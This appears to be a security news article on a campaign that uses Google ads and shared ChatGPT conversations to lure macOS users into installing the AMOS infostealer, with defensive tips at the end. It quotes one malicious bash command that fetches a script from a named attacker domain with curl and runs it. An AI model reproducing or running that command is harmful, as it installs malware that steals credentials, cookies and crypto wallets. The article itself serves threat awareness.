Cybercriminals Exploit ChatGPT’s Platform to Deploy AMOS Infostealer on macOS
A sophisticated cyberattack is currently targeting macOS users by exploiting the official ChatGPT website to distribute the AMOS (Atomic macOS Stealer) malware. This campaign employs a deceptive technique known as ClickFix, leveraging ChatGPT’s chat-sharing feature to disseminate malicious installation guides.
Understanding the ClickFix Technique
ClickFix is a social engineering method that manipulates users into executing harmful commands by presenting them as legitimate fixes or instructions. In this instance, attackers create and share public ChatGPT conversations containing fake installation guides, which appear to originate from OpenAI’s official domain, thereby enhancing their credibility.
The Attack Vector
The attack initiates through paid search advertisements on Google. When users search for terms like ChatGPT Atlas, they encounter sponsored links that seem to direct them to the official ChatGPT website. These ads are titled ChatGPT™ Atlas for macOS – Download ChatGPT Atlas for Mac, lending an air of legitimacy.
Upon clicking these ads, users are redirected to a shared ChatGPT conversation that provides a fraudulent installation guide for a non-existent Atlas browser. This guide instructs users to open the Terminal application on their Mac and execute a specific command:
“`bash
/bin/bash -c $(curl -fsSL ‘https://atlas-extension.com/gt’)
“`
Executing this command downloads a malicious script from the attacker’s server and runs it on the victim’s computer. The script persistently prompts for the system password until the correct one is entered. Once obtained, the script uses these credentials to download and install the AMOS infostealer.
Capabilities of AMOS Infostealer
AMOS is a potent malware designed to extract a wide range of sensitive information from infected macOS systems, including:
– Browser Data: Harvests passwords, cookies, and other data from browsers like Chrome and Firefox.
– Cryptocurrency Wallets: Targets applications such as Electrum, Coinomi, and Exodus to steal wallet information.
– Personal Files: Collects files with extensions like TXT, PDF, and DOCX from directories such as Desktop, Documents, and Downloads.
– System Access: Installs a backdoor that activates at system startup, granting attackers persistent remote access to the compromised system.
Broader Implications and Similar Campaigns
This attack is part of a broader trend where cybercriminals exploit trusted platforms and services to distribute malware. Similar campaigns have been observed:
– Fake Microsoft Teams Site: Attackers created a fraudulent Microsoft Teams download page to deploy the Odyssey macOS stealer, using social engineering tactics to trick users into executing malicious code.
– Weaponized Google Meet Pages: Malicious actors have used fake Google Meet landing pages to deliver Remote Access Trojans (RATs), exploiting the trust users place in widely used communication tools.
– ClickFix Lures: Deceptive prompts like Fix Now and Bot Verification have been employed to trick users into downloading and executing malware, highlighting the evolving nature of social engineering attacks.
Protective Measures for macOS Users
To safeguard against such threats, macOS users should adopt the following practices:
1. Verify Sources: Always download software from official and reputable sources. Be cautious of sponsored links and ads that may lead to malicious sites.
2. Exercise Caution with Terminal Commands: Avoid executing commands in the Terminal unless they come from a trusted and verified source.
3. Stay Informed: Keep abreast of the latest cybersecurity threats and tactics employed by attackers to recognize and avoid potential scams.
4. Implement Security Solutions: Utilize reputable antivirus and anti-malware software to detect and prevent infections.
5. Regular Updates: Ensure that your operating system and all installed applications are up to date with the latest security patches.
Conclusion
The exploitation of ChatGPT’s platform to distribute the AMOS infostealer underscores the increasing sophistication of cyberattacks targeting macOS users. By leveraging trusted domains and employing advanced social engineering techniques, attackers can deceive even vigilant users. Staying informed and adopting robust security practices are essential in mitigating these evolving threats.
